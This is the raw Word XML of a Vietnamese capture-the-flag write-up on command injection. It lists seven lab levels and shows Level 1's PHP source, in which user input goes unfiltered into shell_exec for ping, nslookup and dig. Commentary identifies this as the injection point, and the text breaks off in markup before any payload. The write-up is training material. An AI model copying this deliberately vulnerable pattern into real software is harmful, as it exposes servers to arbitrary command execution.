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685B1" w14:textId="77777777" w:rsidR="00376AFA" w:rsidRPr="00376AFA" w:rsidRDefault="00376AFA" w:rsidP="00376AFA">
      <w:r w:rsidRPr="00376AFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chuỗi thử thách về lỗi bảo mật Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0673A83A" w14:textId="77777777" w:rsidR="00376AFA" w:rsidRPr="00376AFA" w:rsidRDefault="00376AFA" w:rsidP="00376AFA">
      <w:r w:rsidRPr="00376AFA">
        <w:t>Mục tiêu của bạn là chiếm quyền điều khiển server và đọc một tập tin bí mật ở thư mục gốc (đường dẫn /) để chứng minh bạn đã khai thác thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E097324" w14:textId="77777777" w:rsidR="00376AFA" w:rsidRPr="00376AFA" w:rsidRDefault="00376AFA" w:rsidP="00376AFA">
      <w:r w:rsidRPr="00376AFA">
        <w:t>Thử thách này gồm 7 level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B92FD26" w14:textId="77777777" w:rsidR="00376AFA" w:rsidRPr="00376AFA" w:rsidRDefault="00376AFA" w:rsidP="00376AFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00376AFA">
        <w:t>Level 1: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00376AFA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://cmdi.cyberjutsu-lab.tech:3001</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0106892E" w14:textId="77777777" w:rsidR="00376AFA" w:rsidRPr="00376AFA" w:rsidRDefault="00376AFA" w:rsidP="00376AFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00376AFA">
        <w:t>Level 2: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00376AFA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://cmdi.cyberjutsu-lab.tech:3002</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="72C94C40" w14:textId="77777777" w:rsidR="00376AFA" w:rsidRPr="00376AFA" w:rsidRDefault="00376AFA" w:rsidP="00376AFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00376AFA">
        <w:t>Level 3: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00376AFA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://cmdi.cyberjutsu-lab.tech:3003</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F7F2957" w14:textId="77777777" w:rsidR="00376AFA" w:rsidRPr="00376AFA" w:rsidRDefault="00376AFA" w:rsidP="00376AFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00376AFA">
        <w:t>Level 4: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00376AFA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://cmdi.cyberjutsu-lab.tech:3004</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C61B7D0" w14:textId="77777777" w:rsidR="00376AFA" w:rsidRPr="00376AFA" w:rsidRDefault="00376AFA" w:rsidP="00376AFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00376AFA">
        <w:t>Level 5: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00376AFA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://cmdi.cyberjutsu-lab.tech:3005</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0BD56BCD" w14:textId="77777777" w:rsidR="00376AFA" w:rsidRPr="00376AFA" w:rsidRDefault="00376AFA" w:rsidP="00376AFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00376AFA">
        <w:t>Level 6: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00376AFA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://cmdi.cyberjutsu-lab.tech:3006</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="159544A8" w14:textId="77777777" w:rsidR="00376AFA" w:rsidRPr="00376AFA" w:rsidRDefault="00376AFA" w:rsidP="00376AFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00376AFA">
        <w:t>Level 7: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00376AFA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://cmdi.cyberjutsu-lab.tech:3007</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1A77A8D1" w14:textId="77777777" w:rsidR="00376AFA" w:rsidRPr="00376AFA" w:rsidRDefault="00376AFA" w:rsidP="00376AFA">
      <w:r w:rsidRPr="00376AFA">
        <w:t>Bạn hãy tải source code của thử thách và debug ở local trước khi thao tác trên server thật để hiểu rõ bản chất của lỗi nhé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B940DD9" w14:textId="77777777" w:rsidR="00376AFA" w:rsidRPr="00376AFA" w:rsidRDefault="00376AFA" w:rsidP="00376AFA">
      <w:r w:rsidRPr="00376AFA">
        <w:t>Sau khi hoàn thành thử thách, hãy gửi Flag cho tụi mình tại -&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00376AFA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://wpt.cyberjutsu.io/challenges</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79E43950" w14:textId="77777777" w:rsidR="00376AFA" w:rsidRPr="00376AFA" w:rsidRDefault="00376AFA" w:rsidP="00376AFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00376AFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>command_injection.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BF9CDF" w14:textId="2C0ABF0E" w:rsidR="00376AFA" w:rsidRPr="00376AFA" w:rsidRDefault="00376AFA" w:rsidP="00376AFA"/>
    <w:p w14:paraId="40A74A81" w14:textId="79E72092" w:rsidR="001D6E80" w:rsidRDefault="001D6E80">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DCA9C5" w14:textId="77777777" w:rsidR="005C6D63" w:rsidRPr="00FF23DE" w:rsidRDefault="005C6D63" w:rsidP="00142793">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF23DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Level</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF23DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF23DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7469C886" w14:textId="77777777" w:rsidR="005C6D63" w:rsidRPr="00FF23DE" w:rsidRDefault="005C6D63" w:rsidP="005C6D63">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15"/>
      </w:tblGrid>
      <w:tr w:rsidR="00060CBB" w:rsidRPr="00060CBB" w14:paraId="3FC4282B" w14:textId="77777777" w:rsidTr="00060CBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55EC3813" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00060CBB">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="623011EF" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="692CE047" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79A4F78E" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48B9F4C7" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20F0493E" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D3685EC" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FBC83A0" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E12899C" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18360283" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B0B1116" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="229B6D5C" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FBF1958" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="213C2448" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B48936F" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A4CC26B" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DCB6C71" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="000C28A3" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D7F92CF" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="523005BD" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:t>(isset($_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'command'</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:t>],$_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'target'</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:t>])){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1758F290" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:t xml:space="preserve">        $command = $_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'command'</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A5E3C0E" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:t xml:space="preserve">        $target = $_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'target'</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C32B257" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>switch</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:t>($command) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FF0717F" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>case</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"ping"</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="263EF054" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
              <w:t>$result = shell_exec(</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">"timeout 10 ping -c 4 </w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>$target</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 2&gt;&amp;1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57967C2A" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>break</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43263332" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>case</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"nslookup"</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B86DA22" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
              <w:t>$result = shell_exec(</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">"timeout 10 nslookup </w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>$target</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 2&gt;&amp;1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F6B2370" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>break</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:t>;</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C3B7EC3" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>case</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"dig"</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="117B0171" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
              <w:t>$result = shell_exec(</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">"timeout 10 dig </w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>$target</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 2&gt;&amp;1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36F3169B" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>break</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26B707E2" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56B63F31" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>die</w:t>
            </w:r>
            <w:r w:rsidRPr="00060CBB">
              <w:t>($result);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28A32FB1" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17695A91" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRPr="00060CBB" w:rsidRDefault="00060CBB" w:rsidP="00060CBB">
            <w:r w:rsidRPr="00060CBB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E343137" w14:textId="77777777" w:rsidR="00060CBB" w:rsidRDefault="00060CBB"/>
    <w:p w14:paraId="2FDD4C71" w14:textId="0C9EE479" w:rsidR="00CF4644" w:rsidRPr="005E69D3" w:rsidRDefault="00CF4644" w:rsidP="00CF4644">
      <w:r w:rsidRPr="005E69D3">
        <w:t>Đoạn source code này là một ví dụ kinh điển của lỗ hổng Command Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCC934D" w14:textId="36E4CC09" w:rsidR="008237C1" w:rsidRPr="005E69D3" w:rsidRDefault="008237C1" w:rsidP="008237C1">
      <w:r w:rsidRPr="005E69D3">
        <w:t>Biến $target lấy trực tiếp từ $_POST['target'] mà không có bất kỳ kiểm tra hay lọc nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3BD214" w14:textId="77777777" w:rsidR="008237C1" w:rsidRPr="005E69D3" w:rsidRDefault="008237C1" w:rsidP="008237C1">
      <w:r w:rsidRPr="005E69D3">
        <w:t>$target được chèn thẳng vào chuỗi lệnh shell → đây là điểm inject được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF732B0" w14:textId="77777777" w:rsidR="008237C1" w:rsidRPr="005E69D3" w:rsidRDefault="008237C1" w:rsidP="008237C1">
      <w:r w:rsidRPr="005E69D3">
        <w:t>Hàm shell_exec() thực thi lệnh hệ thống → nếu ta chèn thêm lệnh, nó sẽ được thực thi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E70503" w14:textId="77777777" w:rsidR="005E69D3" w:rsidRPr="00CF619D" w:rsidRDefault="005E69D3" w:rsidP="005E69D3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
